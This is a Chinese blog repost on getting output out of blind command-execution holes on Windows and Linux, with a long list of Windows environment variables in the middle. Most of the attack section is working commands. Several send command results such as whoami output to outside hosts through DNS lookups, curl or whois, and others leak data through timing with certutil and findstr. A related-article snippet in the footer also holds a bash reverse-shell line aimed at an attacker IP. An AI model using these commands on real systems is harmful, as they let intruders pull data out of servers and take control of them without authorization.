命令执行无回显的一些姿势

最新推荐文章于 2025-05-16 20:18:14 发布
转载 最新推荐文章于 2025-05-16 20:18:14 发布 · 4k 阅读 · 7 ·
CC 4.0 BY-SA版权
原文链接:https://mp.weixin.qq.com/s/29leAcZlIo9aOSWdRTfcQg?st=384B632A495EAF3FD1E38F83C1F8407AF42407532CA3084FF945ABB74FC61CC4EB8892A34F6F0C1F6138B60AA97E76D098AAC26B617E8E4D37C967294025FB4BDBDD14CB5F8A2D5D21F249A69DE22E4BDF0F5A5C77EA3DF6F0162D8DFAA955CF77B5306F75

前言

最近演练遇到了拿shell后,由于是延时注入,让我极其难受。于是,学习了一下命令执行无回显的一些姿势

windows环境

1.ping %USERNAME%.2plmqc.dnslog.cn

这里的%username%为用户变量

图片

附上windows常用变量:

%APPDATA% :  列出应用程序数据的默认存放位置。

%CD% :  列出当前目录。

%CLIENTNAME% :  列出联接到终端服务会话时客户端的NETBIOS名。

%CMDCMDLINE% :  列出启动当前cmd.exe所使用的命令行。

%CMDEXTVERSION% :  命令出当前命令处理程序扩展版本号。

%CommonProgramFiles% :  列出了常用文件的文件夹路径。

%COMPUTERNAME% :  列出了计算机名。 

%COMSPEC% :  列出了可执行命令外壳(命令处理程序)的路径。

%DATE% :  列出当前日期。

%ERRORLEVEL% :  列出了最近使用的命令的错误代码。

%HOMEDRIVE% :  列出与用户主目录所在的驱动器盘符。

%HOMEPATH% :  列出用户主目录的完整路径。

%HOMESHARE% :  列出用户共享主目录的网络路径。

%LOGONSEVER% :  列出有效的当前登录会话的域名控制器名。

%NUMBER_OF_PROCESSORS% :  列出了计算机安装的处理器数。

%OS% :  列出操作系统的名字。(Windows XP 和 Windows 2000 列为 Windows_NT.)

%Path% :  列出了可执行文件的搜索路径。

%PATHEXT% :  列出操作系统认为可被执行的文件扩展名。 

%PROCESSOR_ARCHITECTURE% :  列出了处理器的芯片架构。

%PROCESSOR_IDENTFIER% :  列出了处理器的描述。

%PROCESSOR_LEVEL% :  列出了计算机的处理器的型号。 

%PROCESSOR_REVISION% :  列出了处理器的修订号。

%ProgramFiles% :  列出了Program Files文件夹的路径。

%PROMPT% :  列出了当前命令解释器的命令提示设置。

%RANDOM% :  列出界于0 和 32767之间的随机十进制数。

%SESSIONNAME% :  列出连接到终端服务会话时的连接和会话名。

%SYSTEMDRIVE% :  列出了Windows启动目录所在驱动器。

%SYSTEMROOT% :  列出了Windows启动目录的位置。

%TEMP% and %TMP% :  列出了当前登录的用户可用应用程序的默认临时目录。

%TIME% :  列出当前时间。

%USERDOMAIN% :  列出了包含用户帐号的域的名字。

%USERNAME% :  列出当前登录的用户的名字。

%USERPROFILE% :  列出当前用户Profile文件位置。

%WINDIR% :  列出操作系统目录的位置。 

[/size][/align][align=left][size=3]变量 类型 描述 

%ALLUSERSPROFILE% 本地 返回“所有用户”配置文件的位置。 

%APPDATA% 本地 返回默认情况下应用程序存储数据的位置。 

%CD% 本地 返回当前目录字符串。 

%CMDCMDLINE% 本地 返回用来启动当前的 Cmd.exe 的准确命令行。 

%CMDEXTVERSION% 系统 返回当前的“命令处理程序扩展”的版本号。 

%COMPUTERNAME%  系统 返回计算机的名称。 

%COMSPEC%  系统 返回命令行解释器可执行程序的准确路径。 

%DATE%  系统 返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息,请参阅 Date。 

%ERRORLEVEL%  系统 返回上一条命令的错误代码。通常用非零值表示错误。 

%HOMEDRIVE%  系统 返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 

%HOMEPATH%  系统 返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 

%HOMESHARE%  系统 返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 

%LOGONSERVER%  本地 返回验证当前登录会话的域控制器的名称。 

%NUMBER_OF_PROCESSORS%  系统 指定安装在计算机上的处理器的数目。 

%OS%  系统 返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。 

%PATH% 系统 指定可执行文件的搜索路径。 

%PATHEXT% 系统 返回操作系统认为可执行的文件扩展名的列表。 

%PROCESSOR_ARCHITECTURE%  系统 返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。 

%PROCESSOR_IDENTFIER% 系统 返回处理器说明。 

%PROCESSOR_LEVEL%  系统 返回计算机上安装的处理器的型号。 

%PROCESSOR_REVISION% 系统 返回处理器的版本号。 

%PROMPT% 本地 返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。 

%RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。 

%SYSTEMDRIVE% 系统 返回包含 Windows server operating system 根目录(即系统根目录)的驱动器。 

%SYSTEMROOT%  系统 返回 Windows server operating system 根目录的位置。 

%TEMP% 和 %TMP% 系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。 

%TIME% 系统 返回当前时间。使用与 time /t 命令相同的格式。由 Cmd.exe 生成。有关 time 命令的详细信息,请参阅 Time。 

%USERDOMAIN% 本地 返回包含用户帐户的域的名称。 

%USERNAME% 本地 返回当前登录的用户的名称。 

%USERPROFILE% 本地 返回当前用户的配置文件的位置。 

%WINDIR% 系统 返回操作系统目录的位置。

%allusersprofile%--------------------所有用户的profile路径

%Userprofile%-----------------------当前用户的配置文件目录

%Appdata%--------------------------当前用户的应用程序路径

%commonprogramfiles%-------------应用程序公用的文件路径

%homedrive%------------------------当前用户的主盘

%Homepath%------------------------当前用户的主目录

%programfiles%----------------------应用程序的默认安装目录

%systemdrive%----------------------系统所在的盘符

%systemroot%-----------------------系统所在的目录

%windir%----------------------------同上,总是跟systemroot一样

%tmp%------------------------------当前用户的临时目录

原文链接:https://blog.csdn.net/qq_17204441/article/details/89063104

2. for /F "delims=\" %i in ('whoami') do ping -n 1 %i.2plmqc.dnslog.cn

这里的可操作性比第一个多了许多

图片

3.curl(win10或winserver2016以上自带curl)

for /F "delims=\" %i in ('whoami') do curl http://www.c6h5no2-sec.top/test/%i

图片

4.如果知道网站绝对路径,直接写个一句话不香吗?

5.如果不出网,也无web服务的情况下,读也不是不可以

whoami > test1234.txt & certutil -encode test1234.txt testencode.txt

将whoami的结果base64编码以后写入testencode.txt

图片

读testencode.txt,利用findstr的去正则,如果符合就会ping自己,这样就会造成延时。

type testencode.txt || findstr "^-----BEGIN\ CERTIFICATE-----\ ZG" && ping 0.0.0.0

要注意,出现换行空格啥的用\空格来进行替换,建议真遇到这种致命的环境,写脚本爆破吧

(好巧不巧,这次的一个目标就这样子.截图为dvwa环境),执行成功就会延时,如图

图片

执行不成功的时间

图片

Linux环境

linux环境下感觉就比较舒服了

1.ping `whoami`.lkq1iu.dnslog.cn

图片

2.curl http://www.c6h5no2-sec.com/test/`whoami`

图片

3.whois -h vps:port `whoami`

vps 开nc监听

图片

4.将命令结果写入文件,延时去读

cat test.txt | grep "^r" && sleep 4

 

SQL中的DNS外带,懒得写了,这个师傅写的蛮好的

https://www.anquanke.com/post/id/98096

【Windows】基于curl命令的Shell上线姿势--解决shiro命令执行工具命令回显拉胯的问题
11-07 1268
基于curl命令的Shell上线姿势--解决shiro命令执行漏洞命令回显拉胯的问题
关于命令执行Bypass的一些思路
hackzkaq的博客
08-24 1442
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-xiao_yi 一、常见命令执行的函数 system() system(string $command, int &$return_var = ?): string 执行系统命令,有回显 passthru() passthru(string $command, int &$return_var = ?): void 执行系统命令并且显示原始输出 shell_exec() shell_exec(string
无回显命令执行漏洞之Linux渗透
K8哥哥
07-11 1019
前言 很多时候命令回显漏洞由于一些特殊原因,无法构造或不方便构造回显,上回讲到JAVA反序列化漏洞Ladon回显方法。本文针对Linux系统实现命令执行漏洞回显方法,虽说JAVA跨平台但并不代表所有系统都预装有JAVA,实际上.NET一样是跨平台的,前提都要系统安装才可以,那么对于未安装JAVA的机器或非JAVA程序产生的命令执行漏洞,如何实现命令回显,将是本文讲述的重点。JAVA篇:http://k8gege.org/Ladon/web_javarce.html PowerShell篇:http://k8
无回显条件下的命令执行判断和利用方式研究
m0_59598029的博客
08-16 662
在渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显命令执行点。面对这些无回显命令执行点,我们很难获取命令执行结果,甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显命令执行点时的判断和利用方法。首先我们需要知道该点是否存在命令执行漏洞,或者我们的命令是否执行成功了。这里的研判方法有很多种,最常用的是直接通过延时判断,类似我们sql注入里的时间盲注:值得一提的是,windows下并没有sleep命令,那么如何通过时间延时的方式判断windows环境下的命令执行呢?
SQL注入复现——DVWA靶场(有回显 vs 无回显
最新发布
2402_84408069的博客
05-16 1134
本文通过DVWA靶场实战,详细介绍了SQL注入的两种主要类型:有回显的注入和无回显的注入。有回显的注入通过直接返回数据库数据或错误信息,利用Union-Based Injection技术快速获取敏感信息,如数据库名、表名和字段内容。无回显的注入则通过布尔盲注或时间盲注,逐字符猜解数据,效率较低但同样有效。文章还提供了自动化脚本示例,并总结了两种注入的关键差异。最后,通过提升DVWA难度和使用预编译语句,展示了如何有效防御SQL注入攻击。通过本次实战,读者可以深入理解SQL注入的利用手法及防御策略。
超全的命令(代码)执行漏洞无回显姿势总结(附带详细代码和测试分析过程)
记录学习,一起进步
03-05 2168
通过:重定向,dnslog外部通信,burpsuite burpcollaborator外部通信,日志监听,netcat监听,反弹shell等不同姿势突破无回显命令执行漏洞
浅谈PHP无回显命令执行
qidiandexiaowu
11-09 1226
以前学过有回显的命令执行,但是无回显的还是第一次接触,这次就记录下来。 判断方法: 1.审计代码(我也不是很会) 2.延时判断 ip=|sleep 5 时间延长了就可能有无回显命令执行。 3.HTTP请求 ①在公网服务器监听监听端口 nc -lp 4444 ②向目标服务器发起http请求,执行curl命令 ip=|curl ip:4444 如果公网服务器能从监听端口得到一些信息,那麽他就可能存在无回显命令执行。 4.DNS请求 第一步 在解析的时候浏览器会检查缓存中有没有域名对应的ip地址,这个缓
[CTF]命令执行无回显利用
热门推荐
cosmoslin的博客
02-21 1万+
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
不可错过!命令执行无回显的一些姿势
Appleteachers的博客
05-21 1145
腾讯二面:Redis与MySQL双写一致性如何保证? 前言: 四月份的时候,有位朋友去面试,他说被问到Redis与MySQL双写一致性如何保证? 这道题其实就是在问缓存和数据库在双写场景下,一致性是如何保证的?本文将跟大家一起来探讨如何回答这个问题。 谈谈一致性: 一致性就是数据保持一致,在分布式系统中,可以理解为多个节点中数据的值是一致的。 强一致性:这种一致性级别是最符合用户直觉的,它要求系统写入什么,读出来的也会是什么,用户体验好,但实现起来往往对系统的性能影响大 弱一致性:这种一致性级别约束了系
干货 | 命令执行漏洞和代码执行漏洞详解
weixin_39670937的博客
06-20 1015
命令执行(RCE)漏洞和代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行命令执行则是调用操作系统命令进行执行 一、命令执行漏洞 1、什么是命令执行 命令执行(Remote Command Execution, RCE) Web应用的脚本代码在执行命令的时候过滤不严 从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令 成因 代码层过滤不严系统的漏洞造成命令注入调用的第三方组件存在代码执行漏洞常见的命令执行函数 PHP:exec、shell_exec、sy
CTF入门web篇17命令执行相关函数及绕过技巧讲解
anquanniu的博客
10-12 2143
命令注入和代码注入区别 之前我们讲过的都是代码注入,注入的代码相当于网页中新的代码,比如去执行数据库读取的操作,我们想办法插入一段代码去执行,这就是代码执行。 命令注入 命令注入执行的是系统中的命令,使目标服务器的命令在目标服务器上去执行我们想要执行的命令,系统命令的执行还是要基于某些函数的调度去实现的。 1、system函数 例如system函数执行系统命令并输出相应的结果: String ...
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
091-从无回显命令执行到getshell的渗透测试.pdf
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 1136
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
php--无回显情况下的命令执行
金灰的博客
06-02 1466
免责声明:本文仅做技术交流与学习...建立通道(信道) --数据传输的路径shell_exec 与 system 相比,shell_exec没有回显结果.
命令执行bypss+无回显curl获取命令执行
qq_36334672的博客
01-26 1198
xp_dirtree ‘c:/’,1将c盘目录插入到tmp表里,这样就可以获取到C盘的文件,以此来探测路径。cat < a.txt : cat程序 显示 a.txt文件的内容 ,cat程序获取的不是文件名,而是a.txt的内容。基于windows的特性,双引号不会影响命令的执行,而^会一定程度的影响命令执行,但是单独使用的时候也是正常的。cat a.txt : cat 程序读a.txt文件,并把它显示出来,cat获取到的是一个a.txt文件名。通过反引号,可以将一些无关的字符夹在在其中,造成混淆的作用。
命令执行无回显以及无字母数字的命令执行
m0re's blog
09-13 2075
前言:最近比赛的时候看到有关命令执行的题目,然后解题过程中发现了无字母数字的命令执行,所以这篇文章学习一下这个知识。 本文目录CTFshow web入门55CTFshow红包题第二弹 以ctfshow的题目来学习一下。 CTFshow web入门55 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modifie
无回显命令执行到getshell的渗透测试
Javachichi的博客
06-02 1216
事情起源于一次渗透测试,机缘巧合之下,发现了一个PHP imap远程命令执行的漏洞点。但尴尬的是,这块命令执行并不会有回显,由此开始了今天的探测之旅。
命令行执行不回显不提示
云在青天水在瓶
04-28 3171
windows copy /Y rmdir /S /Q ---- linux \rm \cp ##### UPDATE 最新的 fedora29 x86_64 上测试: \rm 和 \cp 对于没有可写权限件依然分别回显提示写保护和没有写权限. 方法有: 1. rm -f 和 cp -f 强制删除和复制覆盖目标文件 2. yes | rm target.file ...
命令执行漏洞没有回显
03-29
### 命令执行漏洞无回显的解决方案 当面对命令执行漏洞而没有回显的情况时,可以通过间接方式验证漏洞是否存在以及进一步利用它。以下是几种常见技术: #### 1. **时间延迟法** 通过注入特定命令使目标服务器产生可观察的时间延迟来判断命令是否成功执行。例如,在 Linux 系统上可以使用 `sleep` 命令[^1]。 ```bash ?cmd=sleep+5 ``` 如果请求响应被延迟约 5 秒,则表明命令已成功执行。 #### 2. **DNS 查询外带数据** 构建一个 DNS 请求到攻击者控制的域名,从而实现外部通信。这种方法适用于网络受限环境中无法直接返回 HTTP 数据的情形[^3]。 假设有一个可控域名为 `test.example.com` ,可以在 PHP 脚本中尝试如下操作: ```php <?php system('nslookup $(id) test.example.com'); ?> ``` 这会触发一次基于当前用户 ID 的 DNS 查找记录至指定地址。 #### 3. **文件写入与读取** 某些情况下允许向磁盘存储临时文件或者修改现有配置文件的内容。尽管这些动作本身不会立即反馈给客户端,但后续访问受影响资源可能暴露更改痕迹[^4]。 比如让服务端生成一个新的文本文件 `/tmp/marker.txt` 并填充固定字符串作为标志位: ```bash ?cmd=echo+"pwned">/tmp/marker.txt ``` 稍后再检查此路径下是否有预期标记存在即可确认效果。 #### 4. **反弹 Shell 或其他连接建立机制** 对于更高级别的交互需求来说,设置反向 shell 是一种可行的选择。这种方式需要确保防火墙规则允许来自受害主机主动发起的数据流传输方向逆转[^2]。 下面给出一段简单的 bash 版本示例代码用于演示目的(实际部署前需调整 IP 和端口号): ```bash ?cmd=bash+-i+>/dev/tcp/<attacker_ip>/<port>+0<&1+ ``` 以上策略均能在不同程度满足检测和利用无回显命令执行缺陷的需求,具体选用哪项取决于场景特点和个人偏好等因素综合考量之后决定最佳实践方案. ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值